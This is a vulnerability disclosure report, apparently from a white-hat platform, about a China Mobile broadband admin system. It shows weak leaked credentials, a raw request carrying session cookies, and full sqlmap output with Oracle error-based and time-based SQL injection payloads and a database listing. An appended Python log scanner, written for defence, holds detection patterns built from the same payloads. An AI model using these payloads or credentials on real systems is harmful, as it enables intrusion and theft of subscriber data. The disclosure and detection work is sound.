2016-01-10: Details reported to the vendor; awaiting vendor handling
2016-01-14: Vendor confirmed; details disclosed to the vendor only
2016-01-24: Details disclosed to core white hats and domain experts
2016-02-03: Details disclosed to regular white hats
2016-02-13: Details disclosed to intern white hats
China Mobile information disclosure
Vulnerable address: **.**.**.**:8888/Admin/Account/Login?ReturnUrl=%2F
First, brute-forced user names with Burp: liuyu/111111 has limited privileges, but even that account can see 4,000 users.
Continued looking for a higher-privilege user. #2: SQL injection. There should be many injection points, since many pages offer query functions.
GET /Broadband/Report/PlansMoneyTotal?Search.District=1&Search.PlansMoney=1 HTTP/1.1
Host: **.**.**.**:8888
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __RequestVerificationToken=2jASattMWL2Q1IdJrjqSkwM4eepECJpPGRft_tczDVzY7f0xZe7PfIhZOKHhMpcmyJx4w1wlVagLaKum9kqJrXP1FXK5LQiEFr1QK0G-CT9p2TML6UTJj-3YRNDsZiwPQZke5y2sK6cJjZsaPYtteg2; .ASPXAUTH=AFCFC8445BAE93599E590B9A9CE2799C464162CE7DF6E2C197A75C18B1B46B8CD719CF25E365388DB8359AE4351811CBA6D055CD764067408CB91C4D086ACCED0E4085A56974B28CD1B57FA2C683B897646E8CA83DEDBCAF15245146CE82B781F79B1E5AAAB1C20AEA86F860743464E7C95B02B1007DB2759AFD7BA385D541ED25D65E1AF5B465E2A57D9757CFF8BE11
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: Search.District (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: Search.District=1' AND 7561=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7561=7561) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'bTUn' LIKE 'bTUn&Search.PlansMoney=1

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: Search.District=1' AND 2250=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(117)||CHR(109)||CHR(67),5) AND 'rKTP' LIKE 'rKTP&Search.PlansMoney=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] YAWL
24 databases
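As an added defender-side example (not part of the original report), the following Python scans IIS-style W3C log lines for the two Oracle injection techniques sqlmap reported above (XMLType error-based and DBMS_PIPE time-based) and counts flagged requests per client, since sqlmap needed about 140 requests here. The log lines, client addresses and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus
from collections import Counter

# Constructed IIS W3C log lines: date time s-ip method uri-stem uri-query port user c-ip agent status
SAMPLE_LOG = """\
2016-01-10 10:00:01 10.0.0.5 GET /Broadband/Report/PlansMoneyTotal Search.District=1&Search.PlansMoney=1 8888 - 203.0.113.7 Mozilla/5.0 200
2016-01-10 10:00:02 10.0.0.5 GET /Broadband/Report/PlansMoneyTotal Search.District=1'+AND+7561%3D(SELECT+UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)))+FROM+DUAL)+AND+'bTUn'+LIKE+'bTUn&Search.PlansMoney=1 8888 - 203.0.113.7 sqlmap/1.0 500
2016-01-10 10:00:09 10.0.0.5 GET /Broadband/Report/PlansMoneyTotal Search.District=1'+AND+2250%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(110)%7C%7CCHR(117),5)+AND+'rKTP'+LIKE+'rKTP&Search.PlansMoney=1 8888 - 203.0.113.7 sqlmap/1.0 200
2016-01-10 10:00:15 10.0.0.5 GET /Admin/Account/Login ReturnUrl=%2F 8888 - 198.51.100.2 Mozilla/5.0 200
"""

# Signatures for the two Oracle techniques in the report, matched on the URL-decoded query string.
SIGNATURES = {
    "oracle-error-xmltype": re.compile(r"XMLType\s*\(\s*CHR\s*\(", re.I),
    "oracle-time-dbms_pipe": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
    "quote-boundary": re.compile(r"'\s+AND\s+.+\s+LIKE\s+'", re.I),
}

def parse_iis_line(line):
    """Split one W3C line into the fields used here; None for blank or comment lines."""
    if not line.strip() or line.startswith("#"):
        return None
    f = line.split(" ")
    return {"time": f"{f[0]} {f[1]}", "stem": f[4], "query": f[5], "client": f[8], "status": f[-1]}

def classify(query):
    """Return the names of the signatures that fire on a raw (still encoded) query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Return (client, stem, time, status, tags) for every request carrying a signature."""
    hits = []
    for line in text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            hits.append((rec["client"], rec["stem"], rec["time"], rec["status"], tags))
    return hits

def suspicious_clients(text):
    """Count flagged requests per client address; a scanner produces many hits from one source."""
    return Counter(h[0] for h in scan_log(text))

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(suspicious_clients(SAMPLE_LOG))
```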
After locating the username and password table, the encryption appears to use a key and could not be decrypted. K = 1111117MurghRTdiM = 123456 can be seen.
Tested with some data.
刘怀琪/111111 has very high privileges.
Over ten thousand records.
Able to change service plans and more.
Fix the weak passwords and the numerous injection points in the back end.
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-01-14 16:22
CNVD confirmed and reproduced the described issue; it has been forwarded by CNCERT to China Mobile Communications Corporation, which will coordinate handling with the site's administration department.
None yet